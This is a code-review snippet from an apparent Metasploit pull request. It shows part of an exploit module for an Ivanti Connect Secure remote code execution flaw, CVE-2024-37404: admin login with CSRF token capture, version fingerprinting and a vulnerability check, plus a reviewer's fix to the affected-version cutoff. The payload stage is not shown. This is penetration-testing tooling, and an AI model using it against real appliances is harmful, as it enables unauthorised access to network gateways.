modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_37404.rb

```diff
@@ -0,0 +1,428 @@
+
+    res
+  end
+
+  def login_admin
+    print_status(
+      "Login to the administrative interface with username '#{datastore['ADMIN_USERNAME']}' and password "\
+      "'#{datastore['ADMIN_PASSWORD']}'..."
+    )
+
+    uri = normalize_uri(target_uri.path, '/dana-na/auth/url_admin/welcome.cgi')
+    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => 'true')
+    raise IvantiUnknownError, "[login_admin] No response from '#{uri}'" if res.nil?
+
+    csrf_token = res.get_html_document.xpath('//form/input[@id="xsauth_token"]/@value').text
+    raise IvantiNotFoundError, '[login_admin] Could not find the CSRF token' if csrf_token.empty?
+
+    uri = normalize_uri(target_uri.path, '/dana-na/auth/url_admin/login.cgi')
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => uri,
+      'keep_cookies' => 'true',
+      'vars_post' => {
+        'tz_offset' => (60 * rand(0..8)).to_s,
+        'xsauth_token' => csrf_token,
+        'username' => datastore['ADMIN_USERNAME'],
+        'password' => datastore['ADMIN_PASSWORD'],
+        'realm' => 'Admin Users',
+        'btnSubmit' => 'Sign In'
+      }
+    )
+    raise IvantiUnknownError, "[login_admin] No response from '#{uri}'" if res.nil?
+
+    if res.code == 302 && res.redirection.to_s == '/dana-na/auth/url_admin/welcome.cgi?p=admin%2Dconfirm'
+      print_warning("The admin #{datastore['ADMIN_USERNAME']} is already logged in")
+      res = confirm_login_admin(res.redirection.to_s)
+    end
+
+    if res.code != 302 || res.redirection.to_s != '/dana-admin/misc/admin.cgi'
+      raise IvantiNoAccessError, "[login_admin] Login failed (username: #{datastore['ADMIN_USERNAME']}, password: #{datastore['ADMIN_PASSWORD']})"
+    end
+  end
+
+  def get_version
+    print_status('Getting the version...')
+
+    uri = normalize_uri(target_uri.path, '/dana-admin/sysinfo/sysinfo.cgi')
+    res = send_request_cgi('method' => 'GET', 'uri' => uri, 'keep_cookies' => 'true')
+    raise IvantiUnknownError, "[get_version] No response from '#{uri}'" if res.nil?
+
+    version_str = res.get_html_document.xpath('//span[@id="DSIDSystemSoftwarePkgVersion"]').text
+    raise IvantiNotFoundError, '[get_version] Could not find the version number' if version_str.empty?
+
+    print_good("Found version #{version_str}")
+    unless version_str.match(/(\d+\.[\dR]+)/)
+      raise IvantiNotFoundError, "[get_version] Unexpected version number format: #{version_str}"
+    end
+
+    Rex::Version.new(Regexp.last_match(1))
+  end
+
+  def check
+    begin
+      login_admin
+      @logged = true
+    rescue IvantiError => e
+      return CheckCode::Unknown("Unable to login to the administrative interface: #{e}")
+    end
+
+    begin
+      version = get_version
+    rescue IvantiError => e
+      return CheckCode::Detected("Version number not found: #{e}")
+    end
+
+    unless version < Rex::Version.new('22.3R2')
```

Comment:
```suggestion
    unless version < Rex::Version.new('22.7R2.2')
```

Reply:
Addressed in [f5ac33e](https://github.com/rapid7/metasploit-framework/pull/19595/commits/f5ac33e3a752703734ce6af70caaa24f5612ac65)